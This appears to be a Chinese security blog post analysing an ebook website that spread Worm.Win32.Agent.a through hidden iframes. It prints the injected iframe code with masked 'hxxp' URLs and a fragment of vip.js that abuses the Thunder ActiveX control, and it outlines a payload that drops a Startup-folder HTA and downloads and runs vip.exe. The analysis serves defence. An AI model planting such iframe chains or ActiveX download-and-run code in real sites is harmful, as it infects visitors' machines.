利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站

简介: 利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站

浏览该网站时,Kaspersky报告:恶意脚本: 拒绝访问。

检查该网页,发现代码:

/---
<iframe src=hxxp://x*x*.k*o*5***1.com/index.htm width=50 height=0></iframe>
---/

hxxp://x*x*.k*o*5***1.com/index.htm 包含代码:

/---
<iframe src="hxxp://x*x*.k*o*5***1.com/vip.htm" height=0 width=0></iframe>
<iframe src="hxxp://x*x*.k*o*5***1.com/vip1.htm" height=0 width=0></iframe>
<iframe src="hxxp://x*x*.k*o*5***1.com/vip2.htm" height=0 width=0></iframe>
---/

hxxp://x*x*.k*o*5***1.com/vip.htm 内容为:

/---
<SCRIPT src="vip.js"></SCRIPT>
<BODY οnlοad=shit();><BR><BR>
---/

shit()定义在vip.js中:

/---
function shit()
{
 try{qianxu_fan = new ActiveXObject("ThunderServer.webThunder.1");}
 catch(e){return;}
---/

用来创建ActiveXObject"ThunderServer.webThunder.1"。

vip.js 利用它来的实施:

利用ADODB创建文件:C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta

利用Shell.Run调用IE打开网页 hxxp://www.mv***ps*f.com/kl/vip.exevips.htm,下载病毒文件vip.exe

利用shell.exec运行下载到IE临时文件夹中的病毒文件vip[1].exe


相关文章
|
3月前
|
JavaScript 前端开发 数据安全/隐私保护
一个会下载 Trojan.DL.Agent.wzr 的政府网站
一个会下载 Trojan.DL.Agent.wzr 的政府网站
一个传播Trojan.Win32.Agent.aac的网站
一个传播Trojan.Win32.Agent.aac的网站
|
3月前
|
安全 Shell
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
|
3月前
|
监控 安全 Windows
遭遇通过U盘传播的蠕虫Worm.Win32.Agent.aj/setup.exe等
遭遇通过U盘传播的蠕虫Worm.Win32.Agent.aj/setup.exe等
|
5月前
|
机器学习/深度学习 人工智能 自然语言处理
能自动查找各种漏洞,专用于网络安全的AI Agent
【7月更文挑战第3天】研究表明,大型语言模型(LLM)可应用于网络安全,自动发现和利用漏洞,包括零日漏洞。多Agent系统中,HPTSA规划任务,其他Agent执行具体工作,提升发现和应对漏洞的效率。然而,LLM的复杂性可能导致可解释性、可控性问题,且系统鲁棒性、泛化能力和安全性仍需加强。[链接: arxiv.org/abs/2406.01637]
174 1
|
中间件 Python 数据采集
Scrapy使用随机User-Agent爬取网站
小哈.jpg 在爬虫爬取过程中,我们常常会使用各种各样的伪装来降低被目标网站反爬的概率,其中随机更换User-Agent就是一种手段。 在scrapy中,其实已经内置了User-Agent中间件, class UserAgentMiddl...
1947 0
|
.NET Windows 开发框架
IE10、IE11 User-Agent 导致的 ASP.Net 网站无法写入Cookie 问题
原文:IE10、IE11 User-Agent 导致的 ASP.Net 网站无法写入Cookie 问题      你是否遇到过当使用一个涉及到Cookie操作的网站或者管理系统时,IE 6、7、8、9下都跑的好好的,唯独到了IE10、11这些高版本浏览器就不行了?好吧,这个问题码农连续2天内遇到了2次。
1193 0
|
9天前
|
机器学习/深度学习 人工智能 自然语言处理
Gemini 2.0:谷歌推出的原生多模态输入输出 + Agent 为核心的 AI 模型
谷歌最新推出的Gemini 2.0是一款原生多模态输入输出的AI模型,以Agent技术为核心,支持多种数据类型的输入与输出,具备强大的性能和多语言音频输出能力。本文将详细介绍Gemini 2.0的主要功能、技术原理及其在多个领域的应用场景。
107 20
Gemini 2.0:谷歌推出的原生多模态输入输出 + Agent 为核心的 AI 模型
|
9天前
|
人工智能 API 语音技术
TEN Agent:开源的实时多模态 AI 代理框架,支持语音、文本和图像的实时通信交互
TEN Agent 是一个开源的实时多模态 AI 代理框架,集成了 OpenAI Realtime API 和 RTC 技术,支持语音、文本和图像的多模态交互,具备实时通信、模块化设计和多语言支持等功能,适用于智能客服、实时语音助手等多种场景。
93 15
TEN Agent:开源的实时多模态 AI 代理框架,支持语音、文本和图像的实时通信交互
|
10天前
|
人工智能 自然语言处理 前端开发
Director:构建视频智能体的 AI 框架,用自然语言执行搜索、编辑、合成和生成等复杂视频任务
Director 是一个构建视频智能体的 AI 框架,用户可以通过自然语言命令执行复杂的视频任务,如搜索、编辑、合成和生成视频内容。该框架基于 VideoDB 的“视频即数据”基础设施,集成了多个预构建的视频代理和 AI API,支持高度定制化,适用于开发者和创作者。
73 9
Director:构建视频智能体的 AI 框架,用自然语言执行搜索、编辑、合成和生成等复杂视频任务
下一篇
DataWorks